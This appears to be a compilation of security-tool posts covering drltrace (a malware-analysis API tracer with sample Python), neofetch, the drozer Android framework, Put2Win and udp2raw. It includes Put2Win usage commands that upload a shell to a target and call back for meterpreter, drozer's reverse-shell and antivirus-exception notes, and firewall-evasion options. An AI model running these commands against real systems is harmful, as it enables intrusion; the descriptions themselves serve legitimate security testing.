Drltrace – A Library Calls Tracer For Windows & Linux Applications

Drltrace is a dynamic API call tracer for Windows and Linux applications, designed primarily for malware analysis. Drltrace is built on top of the DynamoRIO dynamic binary instrumentation framework.

The release build can be downloaded here.

Why Drltrace Rocks

  • Fast enough to perform analysis of malicious samples without being detected by time-based anti-research techniques.
  • Supports both x86 and x64 (ARM in future).
  • Supports both Windows and Linux (macOS in future).
  • Supports self-modifying code.
  • Supports all types of library linkage (static and dynamic).
  • Not detectable by standard anti-research approaches (anti-hooking, anti-debugging and anti-emulation).
  • A user can easily add a new function prototype, in an external configuration file, to tell drltrace how to print more details about previously unknown API calls (even for non-system DLLs).
  • Easy to use and to modify for your own purposes (no additional package requirements, no heavyweight GUI).
  • Open-source; the code is clear and well-documented. You can freely build and use your own advanced solution on top of drltrace.


Usage

The usage of drltrace is very simple. A user needs to specify a log directory and a name of a target process in the following way:

drltrace -logdir . -- calc.exe

That’s all: the tool injects the required DLLs into the target process, starts instrumentation and, in parallel, logs information about all library calls executed in the target process:

~~43600~~ msvcrt.dll!__wgetmainargs
    arg 0: 0x010d2364
    arg 1: 0x010d2368
    and return to module id:0, offset:0x193a
~~43600~~ ntdll.dll!EtwEventRegister
    arg 0: 0x002ff994
    arg 1: 0x010d1490
    and return to module id:0, offset:0x157e
~~43600~~ ntdll.dll!EtwEventSetInformation
    arg 0: 0x007b4b40
    arg 1: 0x00000033
    and return to module id:0, offset:0x15a1
~~43600~~ SHELL32.dll!ShellExecuteW
    arg 0: <null> (type=<unknown>, size=0x0)
    arg 1: <null> (type=wchar_t*, size=0x0)
    arg 2: calculator:// (type=wchar_t*, size=0x0)
    arg 3: <null> (type=wchar_t*, size=0x0)
    arg 4: <null> (type=wchar_t*, size=0x0)
    arg 5: 0x1 (type=int, size=0x4)
    and return to module id:0, offset:0x167d

The format of the output is simple and can be easily parsed by an external script:

~~[thread id]~~ [dll name]![api call name]
arg [arg #]: [value] (type=[Windows type name], size=[size of arg])
and return to module id:[module unique id], offset:[offset in memory]

The module unique identifiers table is printed at the end of the log file:

Module Table: version 3, count 70
Columns: id, containing_id, start, end, entry, checksum, timestamp, path
  0,   0, 0x010d0000, 0x010da000, 0x010d1b80, 0x0000f752, 0xb5fe3575,  C:\Windows\SysWOW64\calc.exe
  1,   1, 0x6d4c0000, 0x6d621000, 0x6d563940, 0x00136d65, 0x59ce1b0b,  C:\Users\Max\Downloads\drltrace\drltrace\dynamorio\lib32\release\dynamorio.dll
  2,   2, 0x73800000, 0x73975000, 0x7380dbf7, 0x00000000, 0x59ce1b0f,  C:\Users\Max\Downloads\drltrace\drltrace\bin\release/drltracelib.dll
  3,   3, 0x742f0000, 0x742fa000, 0x742f2a00, 0x0000c877, 0x0adc52c1,  C:\Windows\System32\CRYPTBASE.dll
  4,   4, 0x74300000, 0x74320000, 0x7430c9b0, 0x0002c617, 0x245970b4,  C:\Windows\System32\SspiCli.dll
  5,   5, 0x74410000, 0x74431000, 0x74416900, 0x0002a940, 0x88a53c1d,  C:\Windows\System32\GDI32.dll
  6,   6, 0x74440000, 0x74500000, 0x7446fb20, 0x000cc410, 0xd343d532,  C:\Windows\System32\RPCRT4.dll
  7,   7, 0x74500000, 0x74525000, 0x745047d0, 0x00026737, 0xa39c8991,  C:\Windows\System32\IMM32.DLL
  8,   8, 0x74550000, 0x745c7000, 0x7456e8a0, 0x00081857, 0x73b971e1,  C:\Windows\System32\advapi32.dll
  9,   9, 0x748f0000, 0x74929000, 0x748febd0, 0x00045303, 0xa58be652,  C:\Windows\System32\cfgmgr32.dll
 10,  10, 0x74930000, 0x75c78000, 0x74aa09d0, 0x01377aa6, 0x4b39926b,  C:\Windows\System32\SHELL32.dll

Drltrace can filter out inter-library calls and print only the API calls made from the main module (or from the heap) of the target application when the -only_from_app option is specified, which is very useful for applications that generate huge logs. Drltrace also ships several external scripts to filter the API calls of a certain library and to print only potentially interesting API calls and strings.
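As an added example (not a script shipped with drltrace), the following Python parses a log in this format, resolves return sites through the module table and keeps only the calls returning into a chosen module, which is the idea behind -only_from_app. The sample log is constructed from the fragments above and its module ids are made up.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample in the drltrace output format shown above (not a real log).
SAMPLE_LOG = r"""~~43600~~ msvcrt.dll!__wgetmainargs
    arg 0: 0x010d2364
    arg 1: 0x010d2368
    and return to module id:0, offset:0x193a
~~43600~~ ntdll.dll!EtwEventRegister
    arg 0: 0x002ff994
    arg 1: 0x010d1490
    and return to module id:9, offset:0x157e
~~43600~~ SHELL32.dll!ShellExecuteW
    arg 0: <null> (type=<unknown>, size=0x0)
    arg 1: <null> (type=wchar_t*, size=0x0)
    arg 2: calculator:// (type=wchar_t*, size=0x0)
    arg 5: 0x1 (type=int, size=0x4)
    and return to module id:0, offset:0x167d

Module Table: version 3, count 2
  0,   0, 0x010d0000, 0x010da000, 0x010d1b80, 0x0000f752, 0xb5fe3575,  C:\Windows\SysWOW64\calc.exe
  9,   9, 0x748f0000, 0x74929000, 0x748febd0, 0x00045303, 0xa58be652,  C:\Windows\System32\cfgmgr32.dll
"""

# One regular expression per line shape of the format: call header, argument, return site, module row.
CALL_RE = re.compile(r"^~~(\d+)~~ ([^!]+)!(\S+)$")
ARG_RE = re.compile(r"^\s+arg (\d+): (.*?)(?: \(type=(.*?), size=(0x[0-9a-fA-F]+)\))?$")
RET_RE = re.compile(r"^\s+and return to module id:(\d+), offset:(0x[0-9a-fA-F]+)$")
HEX = r"0x[0-9a-fA-F]+"
MOD_RE = re.compile(rf"^\s*(\d+),\s*\d+,\s*({HEX}),\s*({HEX}),(?:\s*{HEX},){{3}}\s*(.+?)\s*$")

@dataclass
class Arg:
    index: int
    value: str
    type_name: Optional[str] = None  # None when drltrace had no prototype for the call
    size: Optional[int] = None

@dataclass
class Call:
    thread_id: int
    library: str
    name: str
    args: List[Arg] = field(default_factory=list)
    ret_module_id: Optional[int] = None
    ret_offset: Optional[int] = None

@dataclass
class Module:
    id: int
    start: int
    end: int
    path: str

    @property
    def basename(self) -> str:
        # Table paths are Windows paths; drltrace's own entry even mixes '/' and '\'.
        return self.path.replace("\\", "/").rsplit("/", 1)[-1]

def parse_log(text: str) -> Tuple[List[Call], Dict[int, Module]]:
    """Parse the call records and the trailing module table of a drltrace log."""
    calls: List[Call] = []
    modules: Dict[int, Module] = {}
    current: Optional[Call] = None
    for line in text.splitlines():
        if m := CALL_RE.match(line):
            current = Call(int(m.group(1)), m.group(2), m.group(3))
            calls.append(current)
        elif (m := ARG_RE.match(line)) and current is not None:
            size = int(m.group(4), 16) if m.group(4) else None
            current.args.append(Arg(int(m.group(1)), m.group(2), m.group(3), size))
        elif (m := RET_RE.match(line)) and current is not None:
            current.ret_module_id, current.ret_offset = int(m.group(1)), int(m.group(2), 16)
        elif m := MOD_RE.match(line):
            mid = int(m.group(1))
            modules[mid] = Module(mid, int(m.group(2), 16), int(m.group(3), 16), m.group(4))
    return calls, modules

def return_site(call: Call, modules: Dict[int, Module]) -> str:
    """Render the return address as module+offset using the module table."""
    mod = modules.get(call.ret_module_id) if call.ret_module_id is not None else None
    if mod is None or call.ret_offset is None:
        return "<unknown>"
    return f"{mod.basename}+0x{call.ret_offset:x}"

def calls_from_module(calls: List[Call], modules: Dict[int, Module], basename: str) -> List[Call]:
    """Keep calls whose return address lies in the named module. Applied to the main
    executable this is the idea behind -only_from_app (minus its heap case)."""
    ids = {mid for mid, mod in modules.items() if mod.basename.lower() == basename.lower()}
    return [c for c in calls if c.ret_module_id in ids]

def string_args(calls: List[Call]) -> List[Tuple[str, str]]:
    """(api, value) pairs for non-null char*/wchar_t* arguments: a quick triage view of
    the paths, URLs and command lines a sample hands to the OS."""
    return [(c.name, a.value) for c in calls for a in c.args
            if a.type_name in ("char*", "wchar_t*") and a.value != "<null>"]
```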

Command line options

 -logdir              [     .]  Log directory to print library call data
 -only_from_app       [ false]  Reports only library calls from the app
 -follow_children     [  true]  Trace child processes
 -print_ret_addr      [ false]  Print library call's return address
 -num_unknown_args    [     2]  Number of unknown libcall args to print
 -num_max_args        [     6]  Maximum number of arguments to print
 -default_config      [  true]  Use default config file.
 -config              [    ""]  The path to custom config file.
 -ignore_underscore   [ false]  Ignores library routine names starting with "_".
 -only_to_lib         [    ""]  Only reports calls to the library <lib_name>.
 -help                [ false]  Print this message.
 -version             [ false]  Print version number.
 -verbose             [     1]  Change verbosity.
 -use_config          [  true]  Use config file

Configuration file syntax

Drltrace supports external configuration files where a user can describe how drltrace should print arguments for certain API calls.

HANDLE|CreateRemoteThread|HANDLE|SECURITY_ATTRIBUTES*|size_t|THREAD_START_ROUTINE*|VOID*|DWORD|__out DWORD*

Fields are separated by |. The first field is the return type, the second is the function name itself and the rest are the function arguments. The token __out marks output arguments and __inout marks input+output arguments.

Log Visualization

To make working with log files easier, we have implemented a script called api_calls_viz.py which generates RGB images where each pixel color represents a unique API call. For example, the picture below represents the log file of the WannaCry malware.

The large green areas on the picture represent API calls (wcscmp/wcsicmp) which are used to select files with interesting extensions (e.g. docx, xls, py) to encrypt them. The purple areas represent API calls (FindFirstFile/FindNextFile/CryptEncrypt) which are used to enumerate and encrypt files and folders on the disk.

The script can also generate an HTML representation of the generated RGB image in which each element can be selected to show the name of the API call.
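An added example, not the project's api_calls_viz.py, that shows the idea behind it: one colour per distinct API name, calls laid out as pixels in log order, written as a PPM image and as an HTML table whose cells carry the call name. The call sequence is constructed and not taken from a real WannaCry log.

```python
import colorsys
import html
from typing import Dict, List, Tuple

RGB = Tuple[int, int, int]
BLACK: RGB = (0, 0, 0)  # padding for unused cells in the last row

# Constructed call sequence in log order (not taken from a real WannaCry log).
SAMPLE_CALLS = (["FindFirstFileW", "wcscmp", "wcscmp", "wcsicmp", "FindNextFileW"] * 3
                + ["CryptEncrypt", "WriteFile"] * 2)


def palette(calls: List[str]) -> Dict[str, RGB]:
    """One colour per distinct API name, assigned in order of first appearance.
    Hues are spaced by the golden ratio so consecutive IDs get clearly different colours."""
    colors: Dict[str, RGB] = {}
    for name in calls:
        if name not in colors:
            hue = (len(colors) * 0.618033988749895) % 1.0
            r, g, b = colorsys.hsv_to_rgb(hue, 0.8, 0.95)
            colors[name] = (round(r * 255), round(g * 255), round(b * 255))
    return colors


def layout(calls: List[str], width: int) -> List[List[RGB]]:
    """Lay the calls out as pixels, `width` per row, so repeated phases of the program
    (directory scan loops, encryption loops) show up as bands of the same colour."""
    colors = palette(calls)
    rows: List[List[RGB]] = []
    for i in range(0, len(calls), width):
        row = [colors[n] for n in calls[i:i + width]]
        rows.append(row + [BLACK] * (width - len(row)))
    return rows


def to_ppm(rows: List[List[RGB]]) -> bytes:
    """Binary PPM (P6): a text header followed by raw RGB bytes, no image library needed."""
    height, width = len(rows), len(rows[0])
    header = f"P6\n{width} {height}\n255\n".encode("ascii")
    return header + bytes(ch for row in rows for px in row for ch in px)


def to_html(calls: List[str], width: int) -> str:
    """HTML rendering: one coloured cell per call whose title attribute names the API,
    so hovering a pixel reveals which call it is."""
    colors = palette(calls)
    cells = []
    for name in calls:
        r, g, b = colors[name]
        cells.append(f'<td title="{html.escape(name)}" '
                     f'style="background:rgb({r},{g},{b});width:6px;height:6px"></td>')
    rows = ["<tr>" + "".join(cells[i:i + width]) + "</tr>" for i in range(0, len(cells), width)]
    return '<table style="border-collapse:collapse">' + "".join(rows) + "</table>"


if __name__ == "__main__":
    with open("api_calls.ppm", "wb") as f:
        f.write(to_ppm(layout(SAMPLE_CALLS, 5)))
    with open("api_calls.html", "w", encoding="utf-8") as f:
        f.write(to_html(SAMPLE_CALLS, 5))
```

For a real log, feed the API names in log order (e.g. the `[api call name]` field of each call record) instead of SAMPLE_CALLS and choose a width such as 256.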

Neofetch – A command-line System Information Tool

Neofetch is a command-line system information tool written in bash 3.2+. Neofetch displays information about your operating system, software and hardware in an aesthetic and visually pleasing way.

The overall purpose of Neofetch is to be used in screenshots of your system. Neofetch shows the information other people want to see. There are other tools available for proper system statistics/diagnostics.

The information by default is displayed alongside your operating system’s logo. You can further configure Neofetch to instead use an image, a custom ASCII file, your wallpaper or nothing at all.

You can further configure Neofetch to display exactly what you want it to. Through the use of command-line flags and the configuration file you can change existing information outputs or add your own custom ones.

Neofetch supports almost 150 different operating systems. From Linux to Windows, all the way to more obscure operating systems like Minix, AIX and Haiku. If your favourite operating system is unsupported: Open up an issue and support will be added.


Neofetch Installation

Latest Release

  1. Download the latest release.
  2. Run make install inside the script directory to install the script.
    • El Capitan: make PREFIX=/usr/local install
    • Haiku: make PREFIX=/boot/home/config/non-packaged install
    • OpenIndiana: gmake install
    • MinGW/MSys: make -i install
    • NOTE: You may have to run this as root.

Latest Git Master (Bleeding Edge)

  1. Git clone the repo.
    • git clone https://github.com/dylanaraps/neofetch
  2. Change working directory to neofetch.
    • cd neofetch
  3. Install neofetch using the Makefile.
    • make install
    • El Capitan: make PREFIX=/usr/local install
    • Haiku: make PREFIX=/boot/home/config/non-packaged install
    • OpenIndiana: gmake install
    • MinGW/MSys: make -i install
    • NOTE: You may have to run this as root.

NOTE: Neofetch can be uninstalled easily using make uninstall. This removes all of its files from your system.

NOTE: You can run neofetch from any folder on your system, all the makefile does is move the files to a “sane” location. The Makefile is optional.

OS/Distro Packages

This section lists neofetch packages that have been made for specific OS/Distros.

Alpine Linux

Alpine Linux v3.8 and up

  1. Update repositories
    • apk update
  2. Install the package
    • apk add neofetch

Android (Termux)

Neofetch is in Termux’s default repos.

  1. Update repositories
    • sudo apt-get update
  2. Install the package
    • sudo apt-get install neofetch

Arch

Neofetch is available in the official repos.

  • Install the package
    • pacman -S neofetch

BunsenLabs

Neofetch is available in the official repos.

  1. Update repositories
    • sudo apt-get update
  2. Install the package
    • sudo apt-get install neofetch

CRUX

  1. Install git and the git ports(8) driver
    • sudo prt-get depinst git
  2. Add the 6c37-git repository
    • sudo wget -O /etc/ports/6c37-git.git "https://raw.githubusercontent.com/6c37/cross/master/git-driver/6c37-git.git"
  3. Sync the repos
    • sudo ports -u
  4. Add the repo to /etc/prt-get.conf with your text editor of choice
    • prtdir /usr/ports/6c37-git
  5. Install the package
    • sudo prt-get depinst neofetch

Or alternatively use the port:

  1. Download port
    • wget -O ~/work/neofetch/Pkgfile "https://raw.githubusercontent.com/6c37/crux-ports-git/3.2/neofetch/Pkgfile"
  2. Build the package
    • fakeroot pkgmk -d
  3. Install the package
    • sudo pkgadd neofetch#git-*.pkg.tar.gz

Debian

Stretch / Sid (Unstable)

Neofetch is in Debian Stretch/Sid’s official repositories.

  1. Update repositories
    • sudo apt-get update
  2. Install the package
    • sudo apt-get install neofetch

NOTE: Debian stretch repo only contains version 2.0.2.

NOTE2: The third-party bintray repo has been deprecated; if you want to stay up to date with neofetch on Debian stable, you need to manually install newer packages from unstable or download neofetch directly from the git repository, since it is contained in a single file.

Fedora / RHEL / CentOS / Mageia

NOTE: If you are using RHEL/CentOS, replace dnf with yum.

  1. Make sure you have installed dnf-plugins-core
  2. Enable COPR repository
    • sudo dnf copr enable konimex/neofetch
  3. Install the package
    • sudo dnf install neofetch

Alternatively:

  1. If you’re using RHEL/CentOS, make sure you have installed epel-release
  2. Fetch the repo file
    • curl -o /etc/yum.repos.d/konimex-neofetch-epel-7.repo https://copr.fedorainfracloud.org/coprs/konimex/neofetch/repo/epel-7/konimex-neofetch-epel-7.repo
    • NOTE: If you are using Fedora, change epel-7 to fedora-23 or your Fedora version respectively. However, if you are using RHEL/CentOS 6, change it to epel-6.
  3. Install the package
    • sudo dnf install neofetch

Gentoo / Funtoo

You can install app-misc/neofetch from Gentoo/Funtoo’s official repositories.

To install the git version of neofetch, use =app-misc/neofetch-9999 instead.

GoboLinux

Install it with the official recipe.

  • sudo Compile neofetch

iOS

  1. Add http://dylanaraps.com/repo to your cydia sources.
  2. Install neofetch through cydia.

macOS (Homebrew)

  1. Install neofetch with Homebrew
    • brew install neofetch

NixOS

Install it from the official repositories

  • sudo nix-env -i neofetch

Slackware

Download the files from SlackBuilds and follow their instructions.

Solus

You can find neofetch in software center under System Software > System Utilities or type sudo eopkg it neofetch.

Ubuntu

Ubuntu 17.04 and up

Install it from the official repositories.

  1. Update repositories
    • sudo apt update
  2. Install the package
    • sudo apt install neofetch

Ubuntu 16.10 and below

  1. Add PPA
    • sudo add-apt-repository ppa:dawidd0811/neofetch
  2. Update repositories
    • sudo apt update
  3. Install the package
    • sudo apt install neofetch

Ubuntu daily builds

This PPA contains daily builds of neofetch straight from the master branch.

  1. Add PPA
    • sudo add-apt-repository ppa:dawidd0811/neofetch-daily
  2. Update repositories
    • sudo apt update
  3. Install the package
    • sudo apt install neofetch

Void Linux

Install it from the official repositories

  • sudo xbps-install -S neofetch

Drozer v2.4.4 – The Leading Security Assessment Framework For Android

Drozer 2.4.4 is the leading security testing framework for Android. Drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps’ IPC endpoints and the underlying OS.

Drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (MWR’s advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

Drozer 2.4.4 Installation

Building Python wheel

git clone https://github.com/mwrlabs/drozer/
cd drozer
python setup.py bdist_wheel

Installing Python wheel

sudo pip install drozer-2.x.x-py2-none-any.whl

Building for Debian/Ubuntu/Mint

git clone https://github.com/mwrlabs/drozer/
cd drozer
make deb

Installing .deb (Debian/Ubuntu/Mint)

sudo dpkg -i drozer-2.x.x.deb

Building for Redhat/Fedora/CentOS

git clone https://github.com/mwrlabs/drozer/
cd drozer
make rpm

Installing .rpm (Redhat/Fedora/CentOS)

sudo rpm -i drozer-2.x.x-1.noarch.rpm

Building for Windows

NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn’t be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

git clone https://github.com/mwrlabs/drozer/
cd drozer
python.exe setup.py bdist_msi

Installing .msi (Windows)

Run dist/drozer-2.x.x.win-x.msi 

Arch Linux

yaourt -S drozer


Drozer 2.4.4 Usage

Installing the Agent

The drozer Agent can be installed using the Android Debug Bridge (adb).

Download the latest Drozer Agent here.

$ adb install drozer-agent-2.x.x.apk

Starting a Session

You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you’re ready to start exploring.

We will use the server embedded in the drozer Agent to do this.

If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

$ adb forward tcp:31415 tcp:31415

Now, launch the Agent, select the “Embedded Server” option and tap “Enable” to start the server. You should see a notification that the server has started.

Then, on your PC, connect using the drozer Console:

On Linux:

$ drozer console connect

On Windows:

> drozer.bat console connect

If using a real device, the IP address of the device on the network must be specified:

On Linux:

$ drozer console connect --server 192.168.0.10

On Windows:

> drozer.bat console connect --server 192.168.0.10

You should be presented with a drozer command prompt:

selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
dz>

The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

You are now ready to start exploring the device.

Command Reference

Command       Description
run           Executes a drozer module.
list          Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
shell         Start an interactive Linux shell on the device, in the context of the Agent process.
cd            Mounts a particular namespace as the root of the session, to avoid having to repeatedly type the full name of a module.
clean         Remove temporary files stored by drozer on the Android device.
contributors  Displays a list of people who have contributed to the drozer framework and modules in use on your system.
echo          Print text to the console.
exit          Terminate the drozer session.
help          Display help about a particular command or module.
load          Load a file containing drozer commands, and execute them in sequence.
module        Find and install additional drozer modules from the Internet.
permissions   Display a list of the permissions granted to the drozer Agent.
set           Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
unset         Remove a named variable that drozer passes to any Linux shells that it spawns.

Put2Win – Script To Automatize Shell Upload By PUT HTTP Method To Get Meterpreter

Put2Win is a script to automate shell upload via the HTTP PUT method to get meterpreter. The nmap and msfvenom tools must be installed for it to work correctly.


Put2Win Usage

./Put2win.sh -h

This script automatize shell upload by PUT HTTP method to get meterpreter.

Usage: ./Put2win.sh -t TARGET [-p PORT] -u URL_PATH -l LHOST

Examples:

./Put2win.sh -t 192.168.1.80 -u /uploads -l 192.168.1.10
./Put2win.sh -t 192.168.1.80 -p 443 -u /uploads -l 192.168.1.10

Credit: @devploit

UDP2Raw Tunnel – A Tunnel which Turns UDP Traffic into Encrypted UDP/FakeTCP/ICMP

Udp2raw Tunnel is a tunnel which turns UDP traffic into encrypted FakeTCP/UDP/ICMP traffic by using raw sockets, helping you bypass UDP firewalls (or unstable UDP environments). It can defend against replay attacks and supports multiplexing. It also acts as a connection stabilizer.

When used alone, udp2raw tunnels only UDP traffic. Nevertheless, if you use udp2raw together with any UDP-based VPN, you can tunnel any traffic (including TCP/UDP/ICMP); currently OpenVPN/L2TP/ShadowVPN and tinyfecVPN are confirmed to be supported.


Udp2raw Tunnel Features

Send/Receive UDP Packets with ICMP/FakeTCP/UDP headers

ICMP/FakeTCP headers help you bypass UDP blocking, UDP QoS or improper UDP NAT behavior on some ISPs. In ICMP header mode, udp2raw tunnel works like an ICMP tunnel.

UDP headers are also supported. In UDP header mode, it behaves just like a normal UDP tunnel, and you can simply make use of the other features (such as encryption, anti-replay, or connection stabilization).

Simulated TCP with Real-time/Out-of-Order Delivery

In FakeTCP header mode, udp2raw tunnel simulates a 3-way handshake while establishing a connection and simulates seq and ack_seq while transferring data. It also simulates the following TCP options: MSS, sackOk, TS, TS_ack, wscale. Firewalls will regard FakeTCP as a TCP connection, but it is essentially UDP: it supports real-time/out-of-order delivery (just as normal UDP does), with no congestion control or re-transmission. So there won’t be any TCP-over-TCP problem when using OpenVPN.

Encryption, Anti-Replay

  • Encrypt your traffic with AES-128-CBC.
  • Protect data integrity with HMAC-SHA1 (or the weaker MD5/CRC32).
  • Defend against replay attacks with an anti-replay window, similar to IPsec and OpenVPN.
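An added, receiver-side illustration of the anti-replay window described above (not udp2raw's code): an IPsec/OpenVPN-style sliding bitmap window, combined with an HMAC-SHA1 check over sequence number and payload so that a packet with a forged sequence number cannot move the window. The AES-128-CBC payload encryption is left out; the ciphertext is treated as opaque bytes, and the key and packets are constructed.

```python
import hashlib
import hmac
import struct
from typing import List, Optional

TAG_LEN = 20  # HMAC-SHA1 output size
SEQ_LEN = 8   # 64-bit sequence number prefix


class AntiReplayWindow:
    """Sliding-window replay check in the style of IPsec ESP and OpenVPN.
    `top` is the highest sequence number accepted so far; bit i of `bitmap`
    records whether sequence number (top - i) has already been accepted."""

    def __init__(self, size: int = 64):
        self.size = size
        self.top = 0
        self.bitmap = 0
        self.started = False

    def check_and_update(self, seq: int) -> bool:
        """Return True and record `seq` if it is fresh; False for replays and for packets
        older than the window (those are dropped rather than resynchronised to)."""
        mask = (1 << self.size) - 1
        if not self.started:
            self.started, self.top, self.bitmap = True, seq, 1
            return True
        if seq > self.top:                       # newer than anything seen: slide the window
            shift = seq - self.top
            self.bitmap = ((self.bitmap << shift) | 1) & mask if shift < self.size else 1
            self.top = seq
            return True
        offset = self.top - seq
        if offset >= self.size:                  # behind the window: too old to judge
            return False
        if self.bitmap & (1 << offset):          # already accepted: replay
            return False
        self.bitmap |= 1 << offset               # late but first-time: accept out of order
        return True


def seal(key: bytes, seq: int, ciphertext: bytes) -> bytes:
    """Sender: seq || ciphertext || HMAC-SHA1(key, seq || ciphertext). The payload
    encryption itself (AES-128-CBC in udp2raw) is out of scope; `ciphertext` is opaque here."""
    body = struct.pack("!Q", seq) + ciphertext
    return body + hmac.new(key, body, hashlib.sha1).digest()


def open_packet(key: bytes, window: AntiReplayWindow, packet: bytes) -> Optional[bytes]:
    """Receiver. The MAC is verified before the window is consulted, so a party who cannot
    forge the MAC can neither replay a packet nor push `top` forward with a bogus high
    sequence number (which would make the receiver drop the legitimate sender's traffic)."""
    if len(packet) < SEQ_LEN + TAG_LEN:
        return None
    body, tag = packet[:-TAG_LEN], packet[-TAG_LEN:]
    if not hmac.compare_digest(hmac.new(key, body, hashlib.sha1).digest(), tag):
        return None
    seq = struct.unpack("!Q", body[:SEQ_LEN])[0]
    if not window.check_and_update(seq):
        return None
    return body[SEQ_LEN:]


def receive_all(key: bytes, window: AntiReplayWindow, packets: List[bytes]) -> List[Optional[bytes]]:
    """Feed a captured packet sequence through the receiver; None marks a dropped packet."""
    return [open_packet(key, window, p) for p in packets]
```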

Failure Detection & Stabilization (Connection Recovery)

Connection failures are detected by heartbeats. If a timeout occurs, the client will automatically change its port number and reconnect. If reconnection is successful, the previous connection will be recovered, and all existing UDP conversations will stay valid.

For example, if you use udp2raw + OpenVPN, OpenVPN won’t lose its connection after any reconnect, even if the network cable is re-plugged or the WiFi access point is changed.

Other Features

  • Multiplexing: one client can handle multiple UDP connections, all of which share the same raw connection.
  • Multiple clients: one server can have multiple clients.
  • NAT support: all of the 3 modes work in NAT environments.
  • OpenVZ support: tested on BandwagonHost VPS.
  • Easy to build: no dependencies. To cross-compile udp2raw tunnel, all you need to do is download a toolchain, modify the makefile to point at the toolchain and run make cross; then everything is done. (Note: pre-compiled binaries for desktop, Raspberry Pi, Android and some OpenWrt routers are already included in Releases.)

Keywords

Bypass UDP QoS, Bypass UDP Blocking, Bypass OpenVPN TCP over TCP problem, OpenVPN over ICMP, UDP to ICMP tunnel, UDP to TCP tunnel, UDP over ICMP, UDP over TCP

Getting Started

Running

Assume your UDP is blocked, being QoS-ed or just poorly supported. Assume your server IP is 44.55.66.77 and you have a service listening on UDP port 7777.

# Run at server side:
./udp2raw_amd64 -s -l0.0.0.0:4096 -r 127.0.0.1:7777    -k "passwd" --raw-mode faketcp -a

# Run at client side
./udp2raw_amd64 -c -l0.0.0.0:3333  -r44.55.66.77:4096  -k "passwd" --raw-mode faketcp -a

(The above commands need to be run as root. For better security, with some extra steps, you can run udp2raw tunnel as non-root)

Server Output:

Client Output:

Now, an encrypted raw tunnel has been established between client and server through TCP port 4096. Connecting to UDP port 3333 at the client side is equivalent to connecting to port 7777 at the server side. No UDP traffic will be exposed.

Advanced Topic

Usage

udp2raw tunnel
git version:6e1df4b39f    build date:Oct 24 2017 09:21:15
repository: https://github.com/wangyu-/udp2raw-tunnel

usage:
    run as client : ./this_program -c -l local_listen_ip:local_port -r server_address:server_port  [options]
    run as server : ./this_program -s -l server_listen_ip:server_port -r remote_address:remote_port  [options]

common options,these options must be same on both side:
    --raw-mode            <string>        avaliable values:faketcp(default),udp,icmp
    -k,--key              <string>        password to gen symetric key,default:"secret key"
    --cipher-mode         <string>        avaliable values:aes128cbc(default),xor,none
    --auth-mode           <string>        avaliable values:hmac_sha1,md5(default),crc32,simple,none
    -a,--auto-rule                        auto add (and delete) iptables rule
    -g,--gen-rule                         generate iptables rule then exit,so that you can copy and
                                          add it manually.overrides -a
    --disable-anti-replay                 disable anti-replay,not suggested
client options:
    --source-ip           <ip>            force source-ip for raw socket
    --source-port         <port>          force source-port for raw socket,tcp/udp only
                                          this option disables port changing while re-connecting
other options:
    --conf-file           <string>        read options from a configuration file instead of command line.
                                          check example.conf in repo for format
    --fifo                <string>        use a fifo(named pipe) for sending commands to the running program,
                                          check readme.md in repository for supported commands.
    --log-level           <number>        0:never    1:fatal   2:error   3:warn
                                          4:info (default)     5:debug   6:trace
    --log-position                        enable file name,function name,line number in log
    --disable-color                       disable log color
    --disable-bpf                         disable the kernel space filter,most time its not necessary
                                          unless you suspect there is a bug
    --sock-buf            <number>        buf size for socket,>=10 and <=10240,unit:kbyte,default:1024
    --force-sock-buf                      bypass system limitation while setting sock-buf
    --seq-mode            <number>        seq increase mode for faketcp:
                                          0:static header,do not increase seq and ack_seq
                                          1:increase seq for every packet,simply ack last seq
                                          2:increase seq randomly, about every 3 packets,simply ack last seq
                                          3:simulate an almost real seq/ack procedure(default)
                                          4:similiar to 3,but do not consider TCP Option Window_Scale,
                                          maybe useful when firewall doesnt support TCP Option
    --lower-level         <string>        send packets at OSI level 2, format:'if_name#dest_mac_adress'
                                          ie:'eth0#00:23:45:67:89:b9'.or try '--lower-level auto' to obtain
                                          the parameter automatically,specify it manually if 'auto' failed
    --gen-add                             generate iptables rule and add it permanently,then exit.overrides -g
    --keep-rule                           monitor iptables and auto re-add if necessary.implys -a
    --clear                               clear any iptables rules added by this program.overrides everything
    -h,--help                             print this help message

Iptables rules,-a and -g

This program sends packets via a raw socket. In FakeTCP mode, Linux kernel TCP packet processing has to be blocked by an iptables rule on both sides, otherwise the kernel will automatically send RST for an unrecognized TCP packet and you will suffer from stability/performance problems. You can use the -a option to let the program automatically add/delete the iptables rule on start/exit. You can also use the -g option to generate the iptables rule and add it manually.

--cipher-mode and --auth-mode

It is suggested to use aes128cbc + hmac_sha1 to obtain maximum security. If you want to run the program on a router, you can try xor + simple, which can fool packet inspection by firewalls most of the time, but cannot protect you from serious attacks. Mode none is only for debugging purposes. It is not recommended to set the cipher-mode or auth-mode to none.

--seq-mode

The FakeTCP mode does not behave 100% like a real TCP connection. ISPs may be able to distinguish the simulated TCP traffic from real TCP traffic (though it’s costly). seq-mode lets you change the seq increase behavior slightly. If you experience connection problems, try changing the value.

--lower-level

--lower-level allows you to send packets at OSI level 2 (link level), so that you can bypass any local iptables rules. If you have complicated iptables rules which conflict with udp2raw tunnel and you can’t (or are too lazy to) edit them, --lower-level can be very useful. Try --lower-level auto to auto-detect the parameters; you can specify them manually if auto fails.

Manual format: if_name#dest_mac_address, e.g. eth0#00:23:45:67:89:b9.

--keep-rule

